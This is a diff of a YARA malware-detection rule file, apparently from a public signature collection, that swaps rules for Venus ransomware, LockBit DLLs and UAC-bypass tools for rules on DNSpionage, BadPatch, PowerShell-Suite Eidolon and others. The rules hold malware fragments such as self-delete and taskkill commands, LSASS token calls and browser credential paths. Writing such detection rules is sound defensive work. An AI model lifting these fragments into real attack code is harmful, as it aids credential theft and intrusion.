+		hash12 = "da25010a22460bbaabff0f7004204aae7d830348e8a4543177b1f3383b2c3100"
 
 	strings:
-		$h1 = "<?xml "
-		$x1 = "<machineKey validationKey=\"CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF\"" ascii wide
+		$ = "[!] NtCreateThreadEx failed.." fullword ascii
+		$ = "[?] Executing mmc.." ascii
+		$ = "[!] This method is only supported on 64-bit!" fullword ascii
+		$ = "$LNK = [ShellLink.Shortcut]::FromByteArray($LNKHeader.GetBytes())" fullword ascii
+		$ = "$CallResult = [UACTokenMagic]::TerminateProcess($ShellExecuteInfo.hProcess, 1)" fullword ascii
+		$ = "[!] Unable to open process (as Administrator), this may require SYSTEM access." fullword ascii
+		$ = "[!] Error, NTSTATUS Value: " ascii
+		$ = "[!] UAC artifact: " ascii
+		$ = "[>] Process dump success!" ascii
+		$ = "[!] Process dump failed!" ascii
+		$ = "[+] Eidolon entry point:" fullword ascii
+		$ = "Wait for shellcode to run" fullword ascii
+		$ = "$Command = Read-Host \"`nSMB shell\"" fullword ascii
+		$ = "Use Netapi32::NetSessionEnum to enumerate active sessions on domain joined machines." fullword ascii
+		$ = "Invoke-CreateProcess -Binary C:\\Windows\\System32\\" ascii
+		$ = "[?] Thread belongs to: " ascii
+		$ = "[?] Operating system core count: " ascii
+		$ = "[>] Calling Advapi32::LookupPrivilegeValue --> SeDebugPrivilege" fullword ascii
+		$ = "Calling Advapi32::OpenProcessToken --> LSASS" ascii
+		$ = "[!] Mmm, something went wrong! GetLastError returned:" ascii
+		$ = "if (($FileBytes[0..1] | % {[Char]$_}) -join '' -cne 'MZ')" fullword ascii
 
 	condition:
-		filesize <= 300KB and $h1 at 0 and $x1
+		filesize < 100KB and 1 of them
 }
-
-rule SIGNATURE_BASE_MAL_RANSOM_Venus_Nov22_1 : FILE
+rule SIGNATURE_BASE_Powershell_Suite_Eidolon : FILE
 {
 	meta:
-		description = "Detects Venus Ransomware samples"
+		description = "Detects PowerShell Suite Eidolon script - file Start-Eidolon.ps1"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0f7e0ca4-c5e2-5557-92de-2e0d73035f12"
-		date = "2022-11-16"
+		id = "5440d8fc-b939-556f-a8a0-ef5feb29e32f"
+		date = "2017-12-27"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/dyngnosis/status/1592588860168421376"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_ransom_venus.yar#L3-L38"
+		reference = "https://github.com/FuzzySecurity/PowerShell-Suite"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_powershell_suite.yar#L48-L63"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "3c94d59015897f180ef55608a2761b37c7b52193e28895ea6a4c0548acf3ad34"
-		score = 85
+		logic_hash = "587a9a8569801e2aa96a6f171705fdc1db5632734b54e5a9eb8282502e1efc63"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "46f9cbc3795d6be0edd49a2c43efe6e610b82741755c5076a89eeccaf98ee834"
-		hash2 = "6d8e2d8f6aeb0f4512a53fe83b2ef7699513ebaff31735675f46d1beea3a8e05"
-		hash3 = "931cab7fbc0eb2bbc5768f8abdcc029cef76aff98540d9f5214786dccdb6a224"
-		hash4 = "969bfe42819e30e35ca601df443471d677e04c988928b63fccb25bf0531ea2cc"
-		hash5 = "db6fcd33dcb3f25890c28e47c440845b17ce2042c34ade6d6508afd461bfa21c"
-		hash6 = "ee036f333a0c4a24d9aa09848e635639e481695a9209474900eb71c9e453256b"
-		hash7 = "fa7ba459236c7b27a0429f1961b992ab87fc8b3427469fd98bfc272ae6852063"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "db31367410d0a9ffc9ed37f423a4b082639591be7f46aca91f5be261b23212d5"
 
 	strings:
-		$x1 = "<html><head><title>Venus</title><style type = \"text" ascii fullword
-		$x2 = "xXBLTZKmAu9pjcfxrIK4gkDp/J9XXATjuysFRXG4rH4=" ascii fullword
-		$x3 = "%s%x%x%x%x.goodgame" wide fullword
-		$s1 = "/c ping localhost -n 3 > nul & del %s" ascii fullword
-		$s2 = "C:\\Windows\\%s.png" wide
-		$op1 = { 8b 4c 24 24 46 8b 7c 24 14 41 8b 44 24 30 81 c7 00 04 00 00 81 44 24 10 00 04 00 00 40 }
-		$op2 = { 57 c7 45 fc 00 00 00 00 7e 3f 50 33 c0 74 03 9b 6e }
-		$op3 = { 66 89 45 d4 0f 11 45 e8 e8 a8 e7 ff ff 83 c4 14 8d 45 e8 50 8d 45 a4 50 }
+		$ = "[+] Eidolon entry point:" ascii
+		$ = "C:\\PS> Start-Eidolon -Target C:\\Some\\File.Path -Mimikatz -Verbose" fullword ascii
+		$ = "[Int16]$PEArch = '0x{0}' -f ((($PayloadBytes[($OptOffset+1)..($OptOffset)]) | % {$_.ToString('X2')}) -join '')" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 700KB and ( pe.imphash ( ) == "bb2600e94092da119ee6acbbd047be43" or 1 of ( $x* ) or 2 of them ) or 4 of them
+		uint16( 0 ) == 0x7566 and filesize < 13000KB and 1 of them
 }
-rule SIGNATURE_BASE_MAL_Backdoor_DLL_Nov23_1 : CVE_2023_4966 FILE
+rule SIGNATURE_BASE_SUSP_CMD_Var_Expansion : FILE
 {
 	meta:
-		description = "Detects a backdoor DLL, that was seen being used by LockBit 3.0 affiliates exploiting CVE-2023-4966"
-		author = "X__Junior"
-		id = "3588d437-b561-5380-8dac-73a31f4cdb5a"
-		date = "2023-11-23"
+		description = "Detects Office droppers that include a variable expansion string"
+		author = "Florian Roth (Nextron Systems)"
+		id = "3f3ebea0-1d33-513d-b32b-9d87607525e8"
+		date = "2018-09-26"
 		modified = "2023-12-05"
-		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-325a"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ransom_lockbit_citrixbleed_nov23.yar#L1-L22"
+		reference = "https://twitter.com/asfakian/status/1044859525675843585"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_susp_cmd_var_expansion.yar#L2-L14"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6788d37301bb82bd4d9584e192e2fb14d4f6c77801b70299097d8ba139219394"
-		score = 80
+		logic_hash = "68ce14cac07494645f3b5f1d61012e4fe21cfa9fa7ad4019add2368b568fe043"
+		score = 60
 		quality = 85
-		tags = "CVE-2023-4966, FILE"
-		hash1 = "cc21c77e1ee7e916c9c48194fad083b2d4b2023df703e544ffb2d6a0bfc90a63"
-		hash2 = "0eb66eebb9b4d671f759fb2e8b239e8a6ab193a732da8583e6e8721a2670a96d"
+		tags = "FILE"
 
 	strings:
-		$s1 = "ERROR GET INTERVAL" ascii
-		$s2 = "OFF HIDDEN MODE" ascii
-		$s3 = "commandMod:" ascii
-		$s4 = "RESULT:" ascii
-		$op1 = { C7 44 24 ?? 01 00 00 00 C7 84 24 ?? ?? ?? ?? FF FF FF FF 83 7C 24 ?? 00 74 ?? 83 BC 24 ?? ?? ?? ?? 00 74 ?? 4C 8D 8C 24 ?? ?? ?? ?? 41 B8 00 04 00 00 48 8D 94 24 ?? ?? ?? ?? 48 8B 4C 24 ?? FF 15 }
-		$op2 = { 48 C7 44 24 ?? 00 00 00 00 C7 44 24 ?? 00 00 00 00 C7 44 24 ?? 03 00 00 00 48 8D 0D ?? ?? ?? ?? 48 89 4C 24 ?? 4C 8D 0D ?? ?? ?? ?? 44 0F B7 05 ?? ?? ?? ?? 48 8B D0 48 8B 4C 24 ?? FF 15 }
+		$a1 = " /V:ON" ascii wide fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or all of ( $op* ) )
+		uint16( 0 ) == 0xcfd0 and filesize < 500KB and $a1
 }
-rule SIGNATURE_BASE_MAL_Trojan_DLL_Nov23 : CVE_2023_4966 FILE
+rule SIGNATURE_BASE_MAL_DNSPIONAGE_Malware_Nov18 : FILE
 {
 	meta:
-		description = "Detects a trojan DLL that installs other components - was seen being used by LockBit 3.0 affiliates exploiting CVE-2023-4966"
-		author = "X__Junior"
-		id = "1dd87d0a-2b8b-5386-8fdd-40d184c731a4"
-		date = "2023-11-23"
-		modified = "2023-12-05"
-		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-325a"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ransom_lockbit_citrixbleed_nov23.yar#L24-L39"
+		description = "Detects DNSpionage Malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "5a0b498b-b2e9-5827-9908-63586b2cf947"
+		date = "2018-11-30"
+		modified = "2023-01-06"
+		reference = "https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_dnspionage.yar#L2-L21"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9be42742711b4d0440244b507945e074b61c456588580b3263f899a7eb84d8aa"
-		score = 80
+		logic_hash = "c7f148b790c391283ac833236ad7fd3af7af517098adeaf88b8ee8d95df11487"
+		score = 75
 		quality = 85
-		tags = "CVE-2023-4966, FILE"
-		hash1 = "e557e1440e394537cca71ed3d61372106c3c70eb6ef9f07521768f23a0974068"
+		tags = "FILE"
+		hash1 = "2010f38ef300be4349e7bc287e720b1ecec678cacbf0ea0556bcf765f6e073ec"
+		hash2 = "45a9edb24d4174592c69d9d37a534a518fbe2a88d3817fc0cc739e455883b8ff"
 
 	strings:
-		$op1 = { C7 84 24 ?? ?? ?? ?? 52 70 63 53 C7 84 24 ?? ?? ?? ?? 74 72 69 6E C7 84 24 ?? ?? ?? ?? 67 42 69 6E C7 84 24 ?? ?? ?? ?? 64 69 6E 67 C7 84 24 ?? ?? ?? ?? 43 6F 6D 70 C7 84 24 ?? ?? ?? ?? 6F 73 65 41 C7 84 24 ?? ?? ?? ?? 00 40 01 01 }
-		$op2 = { C7 84 24 ?? ?? ?? ?? 6C 73 61 73 C7 84 24 ?? ?? ?? ?? 73 70 69 72 66 C7 84 24 ?? ?? 00 00 70 63 }
-		$op3 = { C7 84 24 ?? ?? ?? ?? 4E 64 72 43 C7 84 24 ?? ?? ?? ?? 6C 69 65 6E C7 84 24 ?? ?? ?? ?? 74 43 61 6C C7 84 24 ?? ?? ?? ?? 6C 33 00 8D }
+		$x1 = ".0ffice36o.com" ascii
+		$s1 = "/Client/Login?id=" ascii
+		$s2 = ".\\Configure.txt" ascii
+		$s5 = "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko" fullword ascii
+		$s6 = "Content-Disposition: form-data; name=\"txts\"" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( 1 of ( $x* ) or 2 of them )
 }
-rule SIGNATURE_BASE_MAL_DLL_Stealer_Nov23 : CVE_2023_4966 FILE
+rule SIGNATURE_BASE_APT_Dnspionage_Karkoff_Malware_Apr19_1 : FILE
 {
 	meta:
-		description = "Detects a DLL that steals authentication credentials - was seen being used by LockBit 3.0 affiliates exploiting CVE-2023-4966"
-		author = "X__Junior"
-		id = "9cfed8ec-1d04-53d7-88ef-2576075cfc33"
-		date = "2023-11-23"
+		description = "Detects DNSpionage Karkoff malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "be955760-ae94-5f77-928d-f4118a97ae6a"
+		date = "2019-04-24"
 		modified = "2023-12-05"
-		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-325a"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ransom_lockbit_citrixbleed_nov23.yar#L41-L54"
+		reference = "https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_dnspionage.yar#L23-L48"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7d0c46d855973cb2c0636aed9c67cfbe47ca260ab1bc842fef1d532725c26910"
-		score = 80
+		logic_hash = "1e8157cec7e70f7c95dffecd1c5a820f29825586a95f2a5c6e4db0a51b1d4708"
+		score = 75
 		quality = 85
-		tags = "CVE-2023-4966, FILE"
-		hash1 = "17a27b1759f10d1f6f1f51a11c0efea550e2075c2c394259af4d3f855bbcc994"
+		tags = "FILE"
+		hash1 = "6a251ed6a2c6a0a2be11f2a945ec68c814d27e2b6ef445f4b2c7a779620baa11"
+		hash2 = "b017b9fc2484ce0a5629ff1fed15bca9f62f942eafbb74da6a40f40337187b04"
+		hash3 = "5b102bf4d997688268bab45336cead7cdf188eb0d6355764e53b4f62e1cdf30c"
+		hash4 = "cd4b9d0f2d1c0468750855f0ed352c1ed6d4f512d66e0e44ce308688235295b5"
 
 	strings:
-		$op1 = { C7 45 ?? 4D 69 6E 69 C7 45 ?? 44 75 6D 70 C7 45 ?? 57 72 69 74 C7 45 ?? 65 44 75 6D C7 45 ?? 70 00 27 00 C7 45 ?? 44 00 62 00 C7 45 ?? 67 00 68 00 C7 45 ?? 65 00 6C 00 C7 45 ?? 70 00 2E 00 C7 45 ?? 64 00 6C 00 C7 45 ?? 6C 00 00 00}
+		$x1 = "Karkoff.exe" fullword wide
+		$x2 = "kuternull.com" fullword wide
+		$x3 = "rimrun.com" fullword wide
+		$s1 = "C:\\Windows\\Temp\\" wide
+		$s2 = "CMD.exe" fullword wide
+		$s3 = "get_ProcessExtensionDataNames" fullword ascii
+		$s4 = "get_ProcessDictionaryKeys" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( 1 of ( $x* ) or all of ( $s* ) )
 }
-rule SIGNATURE_BASE_MAL_Python_Backdoor_Script_Nov23 : CVE_2023_4966 FILE
+rule SIGNATURE_BASE_SUSP_LNK_Suspicious_Folders_Jan25 : FILE
 {
 	meta:
-		description = "Detects a trojan (written in Python) that communicates with c2 - was seen being used by LockBit 3.0 affiliates exploiting CVE-2023-4966"
-		author = "X__Junior"
-		id = "861f9ce3-3c54-5c56-b50b-2b7536783f6e"
-		date = "2023-11-23"
-		modified = "2023-12-05"
-		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-325a"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ransom_lockbit_citrixbleed_nov23.yar#L56-L71"
+		description = "Detects link files (.LNK) with suspicious folders mentioned in the target path"
+		author = "Florian Roth"
+		id = "5f1bcd18-abec-5831-b24f-519c92a2454e"
+		date = "2025-01-24"
+		modified = "2025-03-20"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mixed_open_source_export.yar#L2-L16"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b336f6438a420af49b1b0144039f1051f12c0c54f77a94e2f947f71d1f6230b3"
-		score = 80
+		logic_hash = "776adb706e165389d0abdf8d6f719f6db1ec6d2f3d9d96e1c4a5f2b55e482c31"
+		score = 65
 		quality = 85
-		tags = "CVE-2023-4966, FILE"
-		hash1 = "906602ea3c887af67bcb4531bbbb459d7c24a2efcb866bcb1e3b028a51f12ae6"
+		tags = "FILE"
 
 	strings:
-		$s1 = "port = 443 if \"https\"" ascii
-		$s2 = "winrm.Session basic error" ascii
-		$s3 = "Windwoscmd.run_cmd(str(cmd))" ascii
+		$x1 = "RECYCLER.BIN\\" wide
+		$x2 = "Perflogs\\" wide
 
 	condition:
-		filesize < 50KB and all of them
+		uint16( 0 ) == 0x004c and 1 of them
 }
-rule SIGNATURE_BASE_APT_RANSOM_Lockbit_Forensicartifacts_Nov23
+rule SIGNATURE_BASE_Winagent_Badpatch_1 : FILE
 {
 	meta:
-		description = "Detects patterns found in Lockbit TA attacks exploiting Citrixbleed vulnerability CVE 2023-4966"
-		author = "Florian Roth"
-		id = "04bde599-2a5b-5a33-a6f1-67d57a564946"
-		date = "2023-11-22"
+		description = "Detects samples mentioned in BadPatch report"
+		author = "Florian Roth (Nextron Systems)"
+		id = "732792ed-cb70-5b69-8457-f54177e4609e"
+		date = "2017-10-20"
 		modified = "2023-12-05"
-		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-325a"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ransom_lockbit_citrixbleed_nov23.yar#L73-L86"
+		reference = "https://goo.gl/RvDwwA"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_bad_patch.yar#L11-L39"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6ba1d47e2cac72143c4612c420777024f114afc007c7b15251a58819654aeff1"
+		logic_hash = "568086edb8884877f9dcb0cffa1e4c05164e6884bf80ce50692cedfa3e8d5750"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "285998bce9692e46652529685775aa05e3a5cb93ee4e65d021d2231256e92813"
 
 	strings:
-		$x1 = "taskkill /f /im sqlwriter.exe /im winmysqladmin.exe /im w3sqlmgr.exe"
-		$x2 = " 1> \\\\127.0.0.1\\admin$\\__"
+		$x1 = "J:\\newPatch\\downloader\\" wide
+		$x2 = "L:\\rashed\\New code\\" wide
+		$x3 = ":\\newPatch\\last version\\" wide
+		$x4 = "\\Microsoft\\Microsoft\\Microsoft1.log" wide
+		$x5 = "\\Microsoft\\Microsoft\\Microsoft.log" wide
+		$x6 = "\\Microsoft\\newPP.exe" wide
+		$x7 = " (this is probably a proxy server error)." fullword wide
+		$x8 = " :Old - update patch and check anti-virus.. " fullword wide
+		$x9 = "PatchNotExit-- download now.. " fullword wide
+		$x10 = "PatchNotExit-- Check Version" fullword wide
+		$x11 = "PatchNotExit-- Version Patch" fullword wide
+		$s1 = "downloader " fullword wide
+		$s2 = "DelDownloadFile" fullword ascii
+		$s3 = "downloadFile" fullword ascii
+		$s4 = "downloadUpdate" fullword wide
 
 	condition:
-		1 of ( $x* )
+		( uint16( 0 ) == 0x5a4d and filesize < 600KB and ( 1 of ( $x* ) or 4 of them ) )
 }
-rule SIGNATURE_BASE_SUSP_NET_Msil_Suspicious_Use_Strreverse : FILE
+rule SIGNATURE_BASE_Winagent_Badpatch_2 : FILE
 {
 	meta:
-		description = "Detects mixed use of Microsoft.CSharp and VisualBasic to use StrReverse"
-		author = "dr4k0nia, modified by Florian Roth"
-		id = "830dec40-4412-59c1-8b4d-a237f14acd30"
-		date = "2023-01-31"
-		modified = "2023-02-22"
-		reference = "https://github.com/dr4k0nia/yara-rules"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_susp_net_msil.yar#L2-L31"
+		description = "Detects samples mentioned in BadPatch report"
+		author = "Florian Roth (Nextron Systems)"
+		id = "648528f0-351c-527e-b516-2c8cae9fb4a3"
+		date = "2017-10-20"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/RvDwwA"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_bad_patch.yar#L41-L74"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "02ce0980427dea835fc9d9eed025dd26672bf2c15f0b10486ff8107ce3950701"
-		logic_hash = "a7440600ee4826568d465d204e0a602f61752e4ffcfa3b4f29e5bc81c4d67b46"
-		score = 70
+		logic_hash = "649cfca8fa9d3b9f12b56fd81d4133a00eb5449e67fca2abe85fbfb778912df8"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		version = "1.1"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "106deff16a93c4a4624fe96e3274e1432921c56d5a430834775e5b98861c00ea"
+		hash2 = "ece76fdf7e33d05a757ef5ed020140d9367c7319022a889923bbfacccb58f4d7"
+		hash3 = "cf53fc8c9ce4e5797cc5ac6f71d4cbc0f2b15f2ed43f38048a5273f40bc09876"
+		hash4 = "802a39b22dfacdc2325f8a839377c903b4a7957503106ce6f7aed67e824b82c2"
+		hash5 = "278dba3857367824fc2d693b7d96cef4f06cb7fdc52260b1c804b9c90d43646d"
+		hash6 = "2941f75da0574c21e4772f015ef38bb623dd4d0c81c263523d431b0114dd847e"
+		hash7 = "46f3afae22e83344e4311482a9987ed851b2de282e8127f64d5901ac945713c0"
+		hash8 = "27752bbb01abc6abf50e1da3a59fefcce59618016619d68690e71ad9d4a3c247"
+		hash9 = "050610cfb3d3100841685826273546c829335a5f4e2e4260461b88367ad9502c"
 
 	strings:
-		$a1 = ", PublicKeyToken="
-		$a2 = ".NETFramework,Version="
-		$csharp = "Microsoft.CSharp"
-		$vbnet = "Microsoft.VisualBasic"
-		$strreverse = "StrReverse"
+		$s1 = "myAction=shell_result&serialNumber=" fullword wide
+		$s2 = "\\Appdata\\Local\\Google\\Chrome\\User Data\\Default\\Login Data.*" wide
+		$s3 = "\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles" wide
+		$s4 = "\\Appdata\\Local\\Google\\Chrome\\User Data\\Default\\Cookies.*" wide
+		$s5 = "newSHELL[" fullword wide
+		$s6 = "\\file1.txt" wide
+		$s7 = "myAction=newGIF&serialNumber=" fullword wide
+		$s8 = "\\Storege1" wide
+		$s9 = "\\Microsoft\\mac.txt" wide
+		$s10 = "spytube____:" fullword ascii
+		$s11 = "0D0700045F5C5B0312045A04041F40014B1D11004A1F19074A141100011200154B031C04" fullword wide
+		$s12 = "16161A1000012B162503151851065A1A0007" fullword wide
+		$s13 = "-- SysFile...." fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 50MB and all of ( $a* ) and $csharp and $vbnet and $strreverse
+		( uint16( 0 ) == 0x5a4d and filesize < 700KB and 3 of them )
 }
-rule SIGNATURE_BASE_Win7Elevatev2 : FILE
+rule SIGNATURE_BASE_Blackenergy3_Installer
 {
 	meta:
-		description = "Detects Win7Elevate - Windows UAC bypass utility"
-		author = "Florian Roth (Nextron Systems)"
-		id = "af092d16-ca95-5985-822a-50457c9cbcc9"
-		date = "2015-05-14"
+		description = "Matches unique code block for import name construction "
+		author = "Mike Schladt"
+		id = "4afeb7ac-ce8d-506c-9c97-db7ec6102490"
+		date = "2015-05-29"
 		modified = "2023-12-05"
-		reference = "http://www.pretentiousname.com/misc/W7E_Source/Win7Elevate_Inject.cpp.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/exploit_uac_elevators.yar#L2-L33"
+		reference = "https://www.f-secure.com/documents/996508/1030745/blackenergy_whitepaper.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_blackenergy_installer.yar#L2-L16"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "2f5859388c6074f1a75f0c40387f30ffa50d6b87f20f518fd1af7398c95cd650"
-		score = 60
+		hash = "78387651dd9608fcdf6bfb9df8b84db4"
+		hash = "78636f7bbd52ea80d79b4e2a7882403092bbb02d"
+		logic_hash = "c4c562124427fd394b56e48f16f2d262c8a717fc750b955b2b2a35acb478d5e7"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "4f53ff6a04e46eda92b403faf42219a545c06c29"
-		hash2 = "808d04c187a524db402c5b2be17ce799d2654bd1"
+		tags = ""
 
 	strings:
-		$x1 = "This program attempts to bypass Windows 7's default UAC settings to run " wide
-		$x2 = "Win7ElevateV2\\x64\\Release\\" ascii
-		$x3 = "Run the command normally (without code injection)" wide
-		$x4 = "Inject file copy && elevate command" fullword wide
-		$x5 = "http://www.pretentiousname.com/misc/win7_uac_whitelist2.html" fullword wide
-		$x6 = "For injection, pick any unelevated Windows process with ASLR on:" fullword wide
-		$s1 = "\\cmd.exe" wide
-		$s2 = "runas" wide
-		$s3 = "explorer.exe" wide
-		$s4 = "Couldn't load kernel32.dll" wide
-		$s5 = "CRYPTBASE.dll" wide
-		$s6 = "shell32.dll" wide
-		$s7 = "ShellExecuteEx" ascii
-		$s8 = "COMCTL32.dll" ascii
-		$s9 = "ShellExecuteEx" ascii
-		$s10 = "HeapAlloc" ascii
+		$import_names = { C7 45 D0 75 73 65 72 C7 45 D4 33 32 2E 64 66 C7 45 D8 6C 6C 88 5D DA C7 45 84 61 64 76 61 C7 45 88 70 69 33 32 C7 45 8C 2E 64 6C 6C 88 5D 90 C7 45 B8 77 69 6E 69 C7 45 BC 6E 65 74 2E C7 45 C0 64 6C 6C 00 C7 45 C4 77 73 32 5F C7 45 C8 33 32 2E 64 66 C7 45 CC 6C 6C 88 5D CE C7 45 94 73 68 65 6C C7 45 98 6C 33 32 2E C7 45 9C 64 6C 6C 00 C7 45 E8 70 73 61 70 C7 45 EC 69 2E 64 6C 66 C7 45 F0 6C 00 C7 85 74 FF FF FF 6E 65 74 61 C7 85 78 FF FF FF 70 69 33 32 C7 85 7C FF FF FF 2E 64 6C 6C 88 5D 80 C7 85 64 FF FF FF 6F 6C 65 61 C7 85 68 FF FF FF 75 74 33 32 C7 85 6C FF FF FF 2E 64 6C 6C 88 9D 70 FF FF FF C7 45 DC 6F 6C 65 33 C7 45 E0 32 2E 64 6C 66 C7 45 E4 6C 00 C7 45 A0 76 65 72 73 C7 45 A4 69 6F 6E 2E C7 45 A8 64 6C 6C 00 C7 85 54 FF FF FF 69 6D 61 67 C7 85 58 FF FF FF 65 68 6C 70 C7 85 5C FF FF FF 2E 64 6C 6C 88 9D 60 FF FF FF C7 45 AC 61 70 70 68 C7 45 B0 65 6C 70 2E C7 45 B4 64 6C 6C 00 C7 45 F4 2E 64 6C 6C 88 5D F8 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 1 of ( $x* ) or all of ( $s* ) )
+		any of them
 }
-rule SIGNATURE_BASE_UACME_Akagi
+rule SIGNATURE_BASE_Powershell_Isesteroids_Obfuscation
 {
 	meta:
-		description = "Rule to detect UACMe - abusing built-in Windows AutoElevate backdoor"
+		description = "Detects PowerShell ISESteroids obfuscation"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7979129e-99a3-522a-8285-9061e1e2bd41"
-		date = "2015-05-14"
-		modified = "2023-12-05"
-		reference = "https://github.com/hfiref0x/UACME"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/exploit_uac_elevators.yar#L35-L64"
+		id = "d686c4de-28fd-5d77-91d4-dde5661b75cd"
+		date = "2017-06-23"
+		modified = "2025-02-12"
+		reference = "https://twitter.com/danielhbohannon/status/877953970437844993"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_powershell_obfuscation.yar#L11-L26"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e10f39837a53dcc6d301d21a69fca965aeca0a07cfc832a9a0142b08d280f955"
-		score = 60
+		logic_hash = "6d9476f679614e34a0d13664baffd15b0bdb896f7eeca2c9de66bdc0d65a2eec"
+		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "edd2138bbd9e76c343051c6dc898054607f2040a"
-		hash2 = "e3a919ccc2e759e618208ededa8a543954d49f8a"
 
 	strings:
-		$x1 = "UACMe injected, Fubuki at your service." wide fullword
-		$x3 = "%temp%\\Hibiki.dll" fullword wide
-		$x4 = "[UCM] Cannot write to the target process memory." fullword wide
-		$s1 = "%systemroot%\\system32\\cmd.exe" wide
-		$s2 = "D:(A;;GA;;;WD)" wide
-		$s3 = "%systemroot%\\system32\\sysprep\\sysprep.exe" fullword wide
-		$s4 = "/c wusa %ws /extract:%%windir%%\\system32" fullword wide
-		$s5 = "Fubuki.dll" ascii fullword
-		$l1 = "ntdll.dll" ascii
-		$l2 = "Cabinet.dll" ascii
-		$l3 = "GetProcessHeap" ascii
-		$l4 = "WriteProcessMemory" ascii
-		$l5 = "ShellExecuteEx" ascii
+		$x1 = "/\\/===\\__" ascii
+		$x2 = "${__/\\/==" ascii
+		$x3 = "Catch { }" fullword ascii
+		$x4 = "\\_/=} ${_" ascii
 
 	condition:
-		(1 of ( $x* ) ) or ( 3 of ( $s* ) and all of ( $l* ) )
+		2 of them
 }
-rule SIGNATURE_BASE_Uacelevator : FILE
